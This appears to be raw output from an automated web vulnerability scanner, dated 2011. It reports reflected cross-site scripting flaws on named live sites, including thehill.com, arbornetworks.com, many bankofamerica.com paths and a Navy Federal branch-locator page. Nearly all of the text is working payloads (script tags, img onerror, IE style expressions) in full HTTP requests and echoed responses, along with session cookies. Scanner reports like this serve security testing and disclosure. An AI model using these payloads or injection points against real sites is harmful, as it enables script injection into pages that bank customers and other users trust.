<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4#comments'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 was submitted in the REST URL parameter 4. This input was echoed as 84351'><img src=a onerror=alert(1)>b4355392092 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 HTTP/1.1 Host: thehill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:05:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Thu, 03 Feb 2011 01:20:19 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Set-Cookie: PHPSESSID=4tgmbjdtk4fojqqj58b8p4hiq3; path=/ Connection: close Content-Length: 74000
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img src=a onerror=alert(1)>b4355392092#comments'> ...[SNIP]...
The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c7f"style%3d"x%3aexpression(alert(1))"3660fe20f2a was submitted in the ZCode parameter. This input was echoed as 82c7f"style="x:expression(alert(1))"3660fe20f2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cce12'style%3d'x%3aexpression(alert(1))'28b5d32a9d was submitted in the ZCode parameter. This input was echoed as cce12'style='x:expression(alert(1))'28b5d32a9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 889f8"><script>alert(1)</script>a4569f63444 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76889f8"><script>alert(1)</script>a4569f63444&id=112 HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0d0"><script>alert(1)</script>718295ddb4 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76&id=112ba0d0"><script>alert(1)</script>718295ddb4 HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
2.72. http://www.arbornetworks.com/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.arbornetworks.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458c5"><script>alert(1)</script>6fafaf87cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76&id=112&458c5"><script>alert(1)</script>6fafaf87cd=1 HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b49"><script>alert(1)</script>f4d8274700e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /creditcardsa4b49"><script>alert(1)</script>f4d8274700e/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:10 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fa1"><script>alert(1)</script>1cb498be8e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /depositse9fa1"><script>alert(1)</script>1cb498be8e3/checksave/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:53 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c6"><script>alert(1)</script>20cb5e334dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /deposits/checksave491c6"><script>alert(1)</script>20cb5e334dd/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:54 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac50f"><script>alert(1)</script>4765bb30cc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /financialtoolsac50f"><script>alert(1)</script>4765bb30cc9/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:36:08 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee12"><script>alert(1)</script>8e3b0539708 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /finditbee12"><script>alert(1)</script>8e3b0539708/locator.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:35:37 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58bd1"><script>alert(1)</script>2153a6eecc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /help58bd1"><script>alert(1)</script>2153a6eecc8/equalhousing.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:33:29 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddc5"><script>alert(1)</script>c62490d0000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /helpbddc5"><script>alert(1)</script>c62490d0000/equalhousing_popup.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:25 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1453766315.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec464"><script>alert(1)</script>899a7c53100 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /helpec464"><script>alert(1)</script>899a7c53100/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:33:44 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e1"><script>alert(1)</script>5ff4d40fe3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loansandhomesa99e1"><script>alert(1)</script>5ff4d40fe3b/index.cfm?template=lc_mortgage HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:35:59 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 864f9"><script>alert(1)</script>190e5f7b296 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /onlinebanking864f9"><script>alert(1)</script>190e5f7b296/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:00 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88c92"><script>alert(1)</script>201cd186128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pap88c92"><script>alert(1)</script>201cd186128/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:13 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede62"><script>alert(1)</script>778b0ce2212 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /studentbankingede62"><script>alert(1)</script>778b0ce2212/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:03:58 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=866563755.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ce"><script>alert(1)</script>45ae18a6011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle_and_personal_loans544ce"><script>alert(1)</script>45ae18a6011/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:20 GMT Content-type: text/html Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a923</script><script>alert(1)</script>09ca345e6cd was submitted in the city parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=9&zoom=12&zip=&client=navy&city=9a923</script><script>alert(1)</script>09ca345e6cd HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:06:16 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='9'; var myaddress=''; var mystate=''; var mycity='9a923</script><script>alert(1)</script>09ca345e6cd'; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(12 ...[SNIP]...
The value of the dist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6fe</script><script>alert(1)</script>c091167078b was submitted in the dist parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=96a6fe</script><script>alert(1)</script>c091167078b&zoom=12&zip=&client=navy&city= HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:05:57 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='96a6fe</script><script>alert(1)</script>c091167078b'; var myaddress=''; var mystate=''; var mycity=''; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt( ...[SNIP]...
The value of the zip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a84</script><script>alert(1)</script>6bbb498c306 was submitted in the zip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?client=navy&zip=17a84</script><script>alert(1)</script>6bbb498c306 HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:05:50 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11469
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='3'; var myaddress=''; var mystate=''; var mycity=''; var myzip='17a84</script><script>alert(1)</script>6bbb498c306'; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(8); var maptype ...[SNIP]...
